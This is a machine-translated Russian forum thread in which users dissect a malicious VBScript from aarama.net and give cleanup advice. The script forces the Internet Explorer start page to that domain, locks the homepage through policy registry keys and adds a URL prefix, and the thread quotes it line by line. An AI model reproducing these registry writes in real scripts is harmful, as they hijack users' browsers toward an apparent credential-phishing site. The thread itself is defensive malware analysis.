помочь … вирусу? поставленный под угрозу? (aarama.net)

Я не говорю много сценария, но намерения этого кажутся главным образом ясными.

Set shell = CreateObject("WScript.Shell")

Первая строка, я не полностью уверен в. Однако некоторый поиск с помощью Google, кажется, подтверждает мои мысли, что это - довольно стандартная вводная строка для сценария.

Остальная часть строк, кажется, устанавливает различные ключи реестра.

shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\mirc","http://aarama.net/","REG_SZ"

Этот добавляет новый Префикс URL к Internet Explorer. По существу любое время IE определено для запроса ресурса, начинающегося в "mirc". и протокол не указан, он вставит "http://aarama.net/" перед адресом прежде, чем обработать его. Так, если бы необходимо было ввести "mirc.google.com" в строку поиска, то IE перевел бы ее в "http://aarama.net/mirc.google.com". Это, вероятно, помогает некоторым из других сценариев на злонамеренном сайте (или загруженное вредоносное программное обеспечение) функционировать.

shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"  
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"

Они добавляют Ключи реестра, которые обычно реализуют управление Групповой политикой Internet Explorer. Можно найти, что Вы не можете изменить свою Домашнюю страницу IE через Панель управления больше.

shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://aarama.net/","REG_SZ"  
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://aarama.net/","REG_SZ" 

Они устанавливают "http://aarama.net/" на Вашу домашнюю страницу - гарантирующий, что Вы перейдете к сайту, по крайней мере, однажды, и иметь возможность пасть жертвой любого жульничества фишинга, или вредоносный код может быть там. Конечно, более ранние ключи удостоверятся, что Вы только идете однажды, так как Вы не можете изменить домашнюю страницу.

self.Close

Снова, я действительно не говорю сценарий. Но я думаю, что этот вполне, очевидно, заканчивает его.

Некоторые вещи необходимо сделать с этой информацией:

1.) (Слишком Поздно) не переходите к тому веб-сайту.

2.) Имейте несколько хороших программ антивируса/антивируса, роют через Вашу машину. Мои рекомендации Стой! сканирование времени начальной загрузки, Malwarebytes и SpyBot Search & Destroy. Если возможно, используйте отдельное, известное - хорошая, доступная машина, чтобы сделать сканирования. Или, получите хороший LiveCD для сканирований.

3.) Проверьте свой реестр на стоимость, созданную сценарием. Если они все еще там, создают резервную копию Вашего реестра, то удаляют созданную стоимость или изменяют их на Ваши предпочтительные настройки. Первые три должны просто быть выведены. Последние два, набор к Вашему предпочтению или "about:blank".

4.) Если Вы замечаете какое-либо подозрительное действие по своей системе после этого время для "уничтожения с орбиты" подход. Надежда у Вас есть хорошие резервные копии.

Это действительно выглядит очень нечетным. Я предложил бы несколько вещей - malwarebytes сначала - это - хороший сканер, и один occationally заблокированный вредоносным программным обеспечением - его эффективное, когда это действительно работает. Кроме этого, ищите нечетные процессы в диспетчере процессов и netstat.

Я также предложил бы учиться использовать и использовать руткит revealer (в случае руткитов) и hijackthis для подтверждения - журналы последнего очень полезны при попытке определить, было ли проникновение, tho, они берут некоторую интерпретацию.

Я не эксперт, но похоже, что это делает тот домен домашней страницей для Internet Explorer. Домен связывается с Google phisher.

Цель состоит в том, чтобы заставить Вас подписываться в Вашу учетную запись Google, таким образом, они могут получить учетные записи. Я не бросил хороший взгляд на сайт, но я сомневаюсь, что он делает что-либо еще.

Независимо от того, что необходимо просканировать с Malwarebytes только для проверки.